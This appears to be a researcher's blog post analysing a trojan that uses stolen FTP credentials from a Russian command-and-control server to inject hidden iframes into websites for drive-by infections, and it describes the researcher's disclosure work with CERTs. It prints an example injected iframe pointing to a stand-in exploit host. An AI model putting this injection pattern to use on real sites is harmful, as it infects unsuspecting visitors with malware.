A month ago I found a pretty interesting trojan in my honeypots. In an initial analysis it contacted a server in Russia, and a closer look revealed around 150, sometimes even 200, simultaneous sessions between this server and many different, probably infected, clients. Obviously I was facing quite a large-scaled command and control server (C&C) designed to serve thousands of infected systems in order to keep a bunch of different kinds of malware running. An in depth examination of the data flowing between my honeypots and this C&C suggested that the infected client received usernames and passwords for compromised FTP accounts around the world from the C&C. The origin of those credentials can only be speculated about, but keyloggers or trade in specialized criminal markets for this kind of information would be plausible explanations. Subsequently the infected clients used the supplied credentials in order to log into the affected FTP accounts and recursively scanned for typical filenames appearing on websites (like index.html). Of course not all of those accounts are actually related to websites, but a considerable part of it actually is. Suitable filenames, if found, are modified in a subtle way such that unsuspecting visitors of those websites using browsers with unpatched vulnerabilities would be infected by malware without requiring any additional action by the users. This kind of infection is called a DriveBy infection, because users can be infected by simply accessing a website (hence â€œdrive-byâ€). While the old-fashioned method of sending spam mails with malicious attachments becomes more and more ineffective, DriveBy infections are increasingly posing the method of choice.
Until now it was possible to collect more than 100â€²000 unique FTP credentials from the Russian C&C server.
Here is a short illustration how the criminal process works:
- Heya! Feed me Seymour, I want FTP credentials!
- Here you have some FTP credentials:
- Our zombie tries to login using the supplied FTP credentials.
- If the login is successful,
- He tries to inject malicious code (iframes) into a one or more .html files that already exist on the victim server ftp.host.tld, eg:
< iframe src=evilserver.tld/getexploits.php border=0 >
- An unsuspecting user (“poor-guy”) visits www.host.tld; he trusts this site because he used it many times before and never experienced any problems.
- Poor-guy gets back the normal webcontent as usual, but this time “enriched” with an invisible iframe that points to the malicious domain evilserver.tld.
- The browser of poor-guy is now downloading the script getexploits.php on evilserver.tld…
- But this script getexploits.php is malicious and tries to exploit several well known vulnerabilities in the browser or in installed plugins of poor-guy…
If any of those attacks is successful, the browser of poor-guy will download a trojan from evilserver.tld which turns his computer into another zombie.This zombie can now watch poor-guy’s actions, steal his bank accounts, or install other drive-by infections as in step 1 – the zombie is under control of the attacker.
Cycle 1: Drive-By setup cycle
Cycle 2: Drive-By exploit cycle
Letâ€™s have a closer look at these FTP credentials. Currently there are â€œonlyâ€ around 150 credentials related to Swiss Internet service providers (ISPs) – among others a Swiss university, a website of a cantonal (state) administration, and a couple of international organisations with offices registered in Switzerland.
The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) contacted most of the more important owners meanwhile â€“ contacting all of them will take more time due to their very limited resources. An extended look at the affected accounts worldwide is much scarier though, as credentials from space centres, banks, universities, TV channels and political parties show up.
The table below gives you a short summary of the fifteen countries with the largest number of captured credentials:
|Rank||Country||# of credentials||in %|
As you can see, nearly 30% of the retrieved credentials concerns US ISPs.
Note: UNKNOWN are mostly credentials from private addresses in local area networks (LAN) like 192.168.x.x etc.
Currently Iâ€™m working together with the Swiss Reporting and Analysis Centre for Information Assurance (MELANI) and the US CERT Coordination Center (CERT/CC) to inform the relevant authorities in affected countries, preferably national CERTs, as far as this is possible given the dimension of the problem. Most European countries are already informed.
Last but not least I would like to express special thanks to MELANI / GovCERT.ch and the US CERT/CC who were supporting me since I work on that case. Thank you very much! You guys do a great job!
If you have any question please use the contact form.